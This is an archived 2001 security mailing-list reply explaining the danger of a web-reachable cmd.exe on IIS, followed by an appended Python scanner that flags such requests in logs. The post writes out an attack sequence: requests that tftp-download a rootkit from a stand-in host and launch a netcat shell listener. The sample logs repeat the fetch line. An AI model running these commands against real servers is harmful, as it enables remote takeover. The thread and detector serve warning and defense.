RE: cmd.exe / root.exe question

From: Chris Eidem (jceidem@dexma.com)
Date: 08/27/01


Subject: RE: cmd.exe / root.exe question
Date: Mon, 27 Aug 2001 13:04:10 -0500
Message-ID: <B83445050D0D6B4BAD2801F1585F9D6E0F1B45@xmail1.Dexma.com>
From: "Chris Eidem" <jceidem@dexma.com>
To: <focus-ms@securityfocus.com>


> Where exactly is the risk a cmd.exe (under what name ever) is placed in a
> scriptable directory? I've put cmd.exe into wwwroot under iis5 and gave
> scripting to the file.
>

The exact risk is the ability to execute commands from an HTTP request. Big
risk. Bad idea. No, wait, BAD IDEA!

> Now tried to remotely execute it. I didn't succeed to get a remote shell. Via
> IE5 I could execute the file but got a local shell, only. Netcat with 'nc
> <ip> 80 -v' and 'GET /cmd.exe HTTP/1.0\n' gave my soundchip a ride to hell when
> interpreting all the beeps ;-)
>

You didn't do it right. The dance goes a little like this:

telnet www.dumbvictim.com 80

GET /scripts/cmd.exe+/c+tftp+-i+ftp.badguytools.net+get+rootkit.exe

(gets rootkit.exe which contains all manner of nefarious tools,
including netcat for NT.)

GET /scripts/cmd.exe+/c+nc+-d+-e+cmd.exe+-L+31337

(launch netcat in stealth mode (-d), listen and restart connections on
port 31337 (-L) and run cmd.exe when a connection is made on port 31337.)

nc www.dumbvictim.com 31337

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

tada! r00ted, d00d!

> If cmd were bound to any port and listening I'd see security implications.
> But with only a file lying around?

All you need is a file lying around.

Leaving cmd.exe around is a BAD IDEA(tm)

Chris
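A defender-side check for the exposure discussed in this thread, added here as an example and not part of the original post: it parses IIS W3C extended log records and flags any request whose URI stem names cmd.exe or root.exe (under any path, not only /scripts) or that passes a /c command-line argument. The sample log lines, their field layout and the function names are constructed for this example.

```python
from urllib.parse import unquote

# Constructed sample in IIS 5 W3C extended log format (not real log data).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-27 18:04:10 10.0.0.5 GET /default.htm - 200
2001-08-27 18:04:12 10.0.0.9 GET /scripts/cmd.exe /c+tftp+-i+10.0.0.9+get+rootkit.exe 200
2001-08-27 18:04:13 10.0.0.9 GET /scripts/root.exe /c+dir 200
2001-08-27 18:04:15 10.0.0.7 GET /scripts/CMD.EXE /c+dir 404
2001-08-27 18:04:16 10.0.0.5 GET /images/cmd.exe.gif - 200
"""

# Executable names that must never be reachable through a scriptable directory.
SHELL_NAMES = {"cmd.exe", "root.exe"}

def parse_w3c(text):
    """Yield one dict per record, naming the columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def is_shell_request(rec):
    """True when the stem names a shell executable or the query passes a /c argument."""
    stem = unquote(rec.get("cs-uri-stem", "")).lower()
    query = unquote(rec.get("cs-uri-query", "-")).lower()
    basename = stem.rsplit("/", 1)[-1]
    return basename in SHELL_NAMES or query == "/c" or query.startswith("/c+")

def find_shell_requests(text):
    """Return (client IP, stem, query, status) for every suspicious record.

    A 200 status means IIS actually ran the executable; a 404 means the probe
    failed, but the source is still worth blocking and investigating.
    """
    return [(r["c-ip"], r["cs-uri-stem"], r["cs-uri-query"], r["sc-status"])
            for r in parse_w3c(text) if is_shell_request(r)]

if __name__ == "__main__":
    for hit in find_shell_requests(SAMPLE_LOG):
        print("shell request from %s: %s %s -> %s" % hit)
```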


